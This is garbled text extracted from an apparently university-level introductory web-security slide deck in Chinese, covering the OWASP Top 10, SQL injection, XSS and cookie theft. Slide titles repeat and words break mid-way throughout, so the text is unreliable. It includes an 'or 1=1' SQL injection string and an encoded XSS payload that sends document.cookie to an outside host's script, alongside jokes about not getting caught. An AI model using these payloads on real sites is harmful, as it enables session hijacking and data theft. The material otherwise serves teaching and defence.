大学网页应用程式的安全入门课件

1、Agenda嘴砲OWSAP Top 10SQL injectionXSScookie & session1Agenda嘴砲1Agenda嘴砲OWSAP Top 10SQL injectionXSScookie & session2Agenda嘴砲2不要做壞事！3不要做壞事！3不要被抓到！4不要被抓到！4不要被抓到！5不要被抓到！5不要說我教的6不要說我教的6Agenda嘴砲OWSAP Top 10SQL injectionXSScookie & session7Agenda嘴砲7網頁安全？早年 vs 現代靜態 vs 動態有程式 就有漏洞!8網頁安全？早年 vs 現代8ways to attac

2、kOSweb serverweb application9ways to attackOS9attack scenariosattack web server gain privilege steal informations to attack usersattack other user steal informations execute other attacksmay be composite10attack scenariosattack web serAgenda嘴砲OWSAP Top 10SQL injectionXSScookie & session11Agenda嘴砲111

3、212OWASP Top 10 - 2010A1: InjectionA2: Cross-Site Scripting (XSS)A3: Broken Authentication and Session ManagementA4: Insecure Direct Object ReferencesA5: Cross-Site Request Forgery (CSRF)13OWASP Top 10 - 2010A1: InjectiOWASP Top 10 - 2010A6: Security MisconfigurationA7: Insecure Cryptographic Storag

4、eA8: Failure to Restrict URL AccessA9: Insufficient Transport Layer ProtectionA10: Unvalidated Redirects and Forwards14OWASP Top 10 - 2010A6: SecuritOWASP Top 10 - 2010A1: InjectionA2: Cross-Site Scripting (XSS)A3: Broken Authentication and Session ManagementA4: Insecure Direct Object ReferencesA5:

5、Cross-Site Request Forgery (CSRF)15OWASP Top 10 - 2010A1: InjectiOWASP Top 10 - 2010A6: Security MisconfigurationA7: Insecure Cryptographic StorageA8: Failure to Restrict URL AccessA9: Insufficient Transport Layer ProtectionA10: Unvalidated Redirects and Forwards16OWASP Top 10 - 2010A6: SecuritAgend

6、a嘴砲OWSAP Top 10SQL injectionXSScookie & session17Agenda嘴砲17Injections駭客的填空遊戲where can attacker inject? database (MySQL, MS SQL, PostgreSQL . ) no-sql Directory Service (LDAP) system command!18Injections駭客的填空遊戲18how SQL works in weblogin page for exampleclientweb serversql serverrequest whitid and pw

7、dselect from account where id=id and pwd=pwdreturn result return login success/failed19how SQL works in weblogin pageWhy SQL?廣大使用儲存大量的網站資料injection friendly20Why SQL?廣大使用20how injections work?以MySQL為例子$query = “select from account where id=$id and pwd=$pwd$id= or 1=1 - select from account where id=

8、- 21how injections work?以MySQL為例子2attack skillsunionblind attack22attack skillsunion22影響資料被偷/被改獲得網站權限整個網站被拿下#23影響資料被偷/被改23how to defensesafe API過濾逃脫字元 不要直接把使用者輸入加入query找程式掃描弱點24how to defensesafe API24Practice25Practice25Agenda嘴砲OWSAP Top 10SQL injectionXSScookie & session26Agenda嘴砲26XSSCross Site S

9、cripting在別人的網站上寫程式！ 27XSSCross Site Scripting27background knowledgeHTTP GETHTTP POST28background knowledgeHTTP GET28how to attackattack using POST/GETthe “scripting”in the serverstrange url29how to attackattack using POSThow to attackjavascript / 30how to attackjavascript30example /?id=alert(“im Ora

10、nge”)31examplehttp:/goodsite.cwhat may happened?take you to bad sitesend your information to attackerJust For Fun!32what may happened?take you to Just For Fun SamyMySpace XSS attackSamy is my hero!Infection33Just For Fun SamyMySpace XSS aBig Site also XSSableMySpaceFacebooktwitterPlurk .34Big Site a

11、lso XSSableMySpace34how to defensefor server該逃的還是要逃找程式掃描弱點for user看到奇怪連結要警覺瀏覽器 / 防毒軟體35how to defensefor server35practice36practice36Agenda嘴砲OWSAP Top 10SQL injectionXSScookie & session37Agenda嘴砲37background knowledgecookiesessionA cookie is a piece of text stored by a users web browser.A cookie can

12、 be used for authentication, storing site preferences, shopping cart contents, the identifier for a server-based session, or anything else that can be accomplished through storing text data.The session information is stored on the web server using the session identifier (session ID) generated as a r

13、esult of the first (sometimes the first authenticated) request from the end user running a web browser. The storage of session IDs and the associated session data (user name, account number, etc.) on the web server is accomplished using a variety of techniques including, but not limited to: local me

14、mory, flat files, and databases.38background knowledgecookieA39394040如果偷到了cookie可以41如果偷到了cookie可以41how to steal it?42how to steal it?424343把cookie送到雲端! 用GET / POST方式讓網頁把cookie送走 / ex: .join(sever side is simplejust keep the cookie44把cookie送到雲端! 用GET / POST方式讓網頁把哪個白痴會點這鬼連結/?samname=%22%3E%3Cscript%3E

15、document.write%28%5BString.fromCharCode%2860,105,109,103,32,115,114,99,61,39,104,116,116,112,58,47,47,105,110,49,46,110,99,117,46,99,99,47,126,57,55,53,48,48,50,48,54,51,47,107,101,107,101,47,116,46,112,104,112,63,116,61,34%29,document.cookie,String.fromCharCode%2834,39,62%29.join%28%29%29;%3C/scrip

16、t%3E%3C%2245哪個白痴會點這鬼連結/hidden有種東西叫短網址 ( / 0rz.tw / goo.gl / bit.ly)塞進別的網頁裡 (ex: iframe長寬設0或1)ugly url EVERY WHERE/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http%3A%2F%2F%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&bsv=1eic6yu9oa4y3&scc=1<mpl=default<mplcache=2/config/login?.intl=tw&.p

17、d=c%3d7pP3Kh2p2e4XklntZWWfDLAC8w-&.done=/cgi-bin/kcookie.cgi/www/http%3a/&rl=146hidden有種東西叫短網址 (tinyurl.c防範鎖定user agent / header綁IP*不要被攻擊成功*47防範鎖定user agent / header47鎖定user agent / header if (isset($_SESSIONHTTP_USER_AGENT) if ($_SESSIONHTTP_USER_AGENT != md5($_SERVERHTTP_USER_AGENT) exit(); else $_SESSI